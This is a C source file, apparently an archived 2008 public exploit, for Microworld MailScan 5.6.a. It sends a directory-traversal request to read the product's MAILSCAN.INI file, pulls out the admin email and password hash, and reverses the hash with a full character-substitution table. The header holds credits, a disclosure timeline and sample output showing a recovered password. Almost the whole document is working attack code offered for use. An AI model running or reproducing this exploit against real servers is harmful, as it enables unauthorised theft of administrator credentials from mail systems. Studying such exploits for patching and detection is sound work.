/*
----------------------------------------------------------------------------------------------
_____ ____
/ ___/___ _____/ __ \___ _ __
\__ \/ _ \/ ___/ / / / _ \ | / /
___/ / __/ /__/ /_/ / __/ |/ /
/____/\___/\___/_____/\___/|___/
[2008] SecurityDevelopment.net
Author: SlaYeR
Date: 25. Aug. 2008
Email: slayer@securitydevelopment.net
Website: www.securitydevelopment.net
IRC: dragon.overfl0w.org #securitydevelopment.net
----------------------------------------------------------------------------------------------
Exploit based on the advisory from Oliver Karow @
http://securityvulns.com/Udocument375.html
- MailScan for Mail Servers
* Version: 5.6.a with espatch1
* Win32 Platform
Other Mailscan Products, Versions, also, if available
for other platforms, were not tested.
I used the Directory Traversal methode to access the ini file of mailscan
application to gain some importend data.
After some research i found out that the password algorithm was extreamly
weak. So i decided to code a exploit for it.
15. Aug. 2008 - Advisory release
20. Aug. 2008 - SlaYeR founds out about the advisory
21. Aug. 2008 - Found out about the ini file
22. Aug. 2008 - Found out about the weak algorithm and coded a sploit for it.
25. Aug. 2008 - Private version done.
04. Sep. 2008 - Hotfix released by Microworld.
09. Sep. 2008 - Public release
Some special greets to:
Dams - He helped me with some stupid errors inside the decode_hash function
JGS - He helped me with the spliting hash part
Mikke8 - He didn't helped me but i like hem;)
Team Ph0enix - Cuz they Own
----------------------------------------------------------------------------------------------
Example:
_____ ____
/ ___/___ _____/ __ \___ _ __
\__ \/ _ \/ ___/ / / / _ \ | / /
___/ / __/ /__/ /_/ / __/ |/ /
/____/\___/\___/_____/\___/|___/
[2008] SecurityDevelopment.net
- Microworld Mailscan 5.6.a password reveal exploit -
Coded by: SlaYeR
[!] Targeting 192.168.1.111:10443
[!] Building magic string!
[!] Connected to host!
[!] Building request!
[!] Opening target!
[+] SERVER: MailScan 5.6a
[+] ADMIN: insecure-mailscan@securitydevelopment.net
[+] HASH: GJBIAHALBCHIBJGJGGAEBMAFBIGGAGGKAIBJHLBMAEBJDHAPBH
[+] PASS: "sl@y3r"-owns-m!cr0word|\
[+] Done!
----------------------------------------------------------------------------------------------
*/
#include <stdio.h>
#include <windows.h>
#include <wininet.h>
#pragma comment(lib, "wininet")
#pragma comment(lib,"ws2_32")
char *SECDEV_ASCII=
" _____ ____ \n"
" / ___/___ _____/ __ \\___ _ __\n"
" \\__ \\/ _ \\/ ___/ / / / _ \\ | / /\n"
" ___/ / __/ /__/ /_/ / __/ |/ / \n"
" /____/\\___/\\___/_____/\\___/|___/ \n"
" [2008] SecurityDevelopment.net\r\n"
"\r\n"
" - Microworld Mailscan 5.6.a password reveal exploit -\r\n"
" Coded by: SlaYeR\r\n"
" \r\n\r\n";
int decode_hash(char * string);
int Count;
int exploit(char *url,char *port);
int main(int argc, char *argv[])
{
char *url = argv[1];
char *port = argv[2];
printf(SECDEV_ASCII);
if( argc <= 2 )
{
printf(" Usage: %s <IP> <PORT>\n",argv[0]);
return 0;
}
else
{
exploit(url,port);
}
return 0;
}
int exploit(char *url,char *port)
{
printf("[!] Targeting %s:%s\n",url,port);
HINTERNET httpopen, openurl;
char buffer2[1024];
DWORD read;
char *check;
char *string1 = "http://";
char *string2 = "/../../../../PROGRA~1/MailScan/MAILSCAN.INI";
char bigbuffer[1025];
char buffer3[1025];
char buffer4[1025];
char buffer5[1025];
char buffer6[1025];
if(httpopen = InternetOpen(NULL, INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0))
{
printf("[!] Building request!\n");
memset(bigbuffer,0,1025);
memcpy(bigbuffer,string1,strlen(string1));
memcpy(bigbuffer+strlen(bigbuffer),url,strlen(url));
memcpy(bigbuffer+strlen(bigbuffer),":",strlen(":"));
memcpy(bigbuffer+strlen(bigbuffer),port,strlen(port));
memcpy(bigbuffer+strlen(bigbuffer),string2,strlen(string2));
}
else
{
printf("[-] Error building request!\n");
InternetCloseHandle(httpopen);
CloseHandle(buffer2);
return 0;
}
printf("[!] Trying to connect @ %s:%s\n",url,port);
if(openurl = InternetOpenUrl(httpopen, bigbuffer, NULL, NULL,
INTERNET_FLAG_RELOAD | INTERNET_FLAG_NO_CACHE_WRITE, NULL))
{
printf("[!] Connected to host!\n");
}
else
{
printf("[-] Error while connecting! \n");
InternetCloseHandle(httpopen);
InternetCloseHandle(openurl);
CloseHandle(buffer2);
return 0;
}
if(InternetReadFile(openurl, buffer2, sizeof(buffer2), &read))
{
if(check = strstr(buffer2, "[General]"))
{
check = strstr(buffer2, "UserPassword=");
sscanf(check, "UserPassword=%s ", buffer3);
check = strstr(buffer2, "AdminEmailId=");
sscanf(check, "AdminEmailId=%s ", buffer4);
check = strstr(buffer2, "ProductName=");
sscanf(check, "ProductName=%s ", buffer5);
check = strstr(buffer2, "Version=");
sscanf(check, "Version=%s ", buffer6);
}
if( check==NULL )
{
printf("[-] Server not vuln :(\n");
}
else
{
printf("[+] SERVER: %s %s\n",buffer5,buffer6);
printf("[+] ADMIN: %s\n",buffer4);
printf("[+] HASH: %s\n",buffer3);
printf("[+] PASS: ");
char bufferfiller[sizeof(buffer3)];
char temp[1025];
memset(bufferfiller,0,sizeof(buffer3));
for (int i=0;i < strlen(buffer3); i++)
{
Count++;
sprintf(temp,"%c",buffer3[i]);
memcpy(bufferfiller+strlen(bufferfiller),temp,strlen(temp));
if(Count == 2)
{
char buf[255];
memset(buf,0,sizeof(255));
sprintf(buf,"%s",bufferfiller);
decode_hash(buf);
memset(bufferfiller,0,1025);
Count = 0;
}
}
printf("\n[+] Done!\n");
}
}
else
{
printf("[-] Server not vuln :(\n");
}
InternetCloseHandle(httpopen);
InternetCloseHandle(openurl);
CloseHandle(buffer2);
return 0;
}
int decode_hash(char * string)
{
// Yes it token me allot of work to wrote this down... (only default
charset)
// if you want more just do it by yourself
if( strcmp( string, "DA" ) == 0 ){printf("{");} if( strcmp( string, "DG"
) == 0 ){printf("}");}
if( strcmp( string, "BH" ) == 0 ){printf("|");} if( strcmp( string, "HB"
) == 0 ){printf(":");}
if( strcmp( string, "GJ" ) == 0 ){printf("\"");} if( strcmp( string, "HH"
) == 0 ){printf("<");}
if( strcmp( string, "HF" ) == 0 ){printf(">");} if( strcmp( string, "HE"
) == 0 ){printf("?");}
if( strcmp( string, "BA" ) == 0 ){printf("[");} if( strcmp( string, "BG"
) == 0 ){printf("]");}
if( strcmp( string, "BH" ) == 0 ){printf("\\");} if( strcmp( string, "HA"
) == 0 ){printf(";");}
if( strcmp( string, "GM" ) == 0 ){printf("'");} if( strcmp( string, "GH"
) == 0 ){printf(",");}
if( strcmp( string, "GF" ) == 0 ){printf(".");} if( strcmp( string, "GE"
) == 0 ){printf("/");}
if( strcmp( string, "DF" ) == 0 ){printf("~");} if( strcmp( string, "GK"
) == 0 ){printf("!");}
if( strcmp( string, "AL" ) == 0 ){printf("@");} if( strcmp( string, "GI"
) == 0 ){printf("#");}
if( strcmp( string, "GP" ) == 0 ){printf("$");} if( strcmp( string, "GO"
) == 0 ){printf("%");}
if( strcmp( string, "BF" ) == 0 ){printf("^");} if( strcmp( string, "GN"
) == 0 ){printf("&");}
if( strcmp( string, "GB" ) == 0 ){printf("*");} if( strcmp( string, "GD"
) == 0 ){printf("(");}
if( strcmp( string, "BE" ) == 0 ){printf("_");} if( strcmp( string, "GA"
) == 0 ){printf("+");}
if( strcmp( string, "GG" ) == 0 ){printf("-");} if( strcmp( string, "HG"
) == 0 ){printf("=");}
if( strcmp( string, "AK" ) == 0 ){printf("a");} if( strcmp( string, "AJ"
) == 0 ){printf("b");}
if( strcmp( string, "AI" ) == 0 ){printf("c");} if( strcmp( string, "AP"
) == 0 ){printf("d");}
if( strcmp( string, "AO" ) == 0 ){printf("e");} if( strcmp( string, "AN"
) == 0 ){printf("f");}
if( strcmp( string, "AM" ) == 0 ){printf("g");} if( strcmp( string, "AD"
) == 0 ){printf("h");}
if( strcmp( string, "AC" ) == 0 ){printf("i");} if( strcmp( string, "AB"
) == 0 ){printf("j");}
if( strcmp( string, "AA" ) == 0 ){printf("k");} if( strcmp( string, "AH"
) == 0 ){printf("l");}
if( strcmp( string, "AG" ) == 0 ){printf("m");} if( strcmp( string, "AF"
) == 0 ){printf("n");}
if( strcmp( string, "AE" ) == 0 ){printf("o");} if( strcmp( string, "BL"
) == 0 ){printf("p");}
if( strcmp( string, "BK" ) == 0 ){printf("q");} if( strcmp( string, "BJ"
) == 0 ){printf("r");}
if( strcmp( string, "BI" ) == 0 ){printf("s");} if( strcmp( string, "BP"
) == 0 ){printf("t");}
if( strcmp( string, "BO" ) == 0 ){printf("u");} if( strcmp( string, "BN"
) == 0 ){printf("v");}
if( strcmp( string, "BM" ) == 0 ){printf("w");} if( strcmp( string, "BD"
) == 0 ){printf("x");}
if( strcmp( string, "BC" ) == 0 ){printf("y");} if( strcmp( string, "BB"
) == 0 ){printf("z");}
if( strcmp( string, "HK" ) == 0 ){printf("1");} if( strcmp( string, "HJ"
) == 0 ){printf("2");}
if( strcmp( string, "HI" ) == 0 ){printf("3");} if( strcmp( string, "HP"
) == 0 ){printf("4");}
if( strcmp( string, "HO" ) == 0 ){printf("5");} if( strcmp( string, "HN"
) == 0 ){printf("6");}
if( strcmp( string, "HM" ) == 0 ){printf("7");} if( strcmp( string, "HD"
) == 0 ){printf("8");}
if( strcmp( string, "HC" ) == 0 ){printf("9");} if( strcmp( string, "HL"
) == 0 ){printf("0");}
if( strcmp( string, "GC" ) == 0 ){printf(")");} if( strcmp( string, "GL"
) == 0 ){printf(" ");}
return 0;
}
// milw0rm.com [2008-09-09]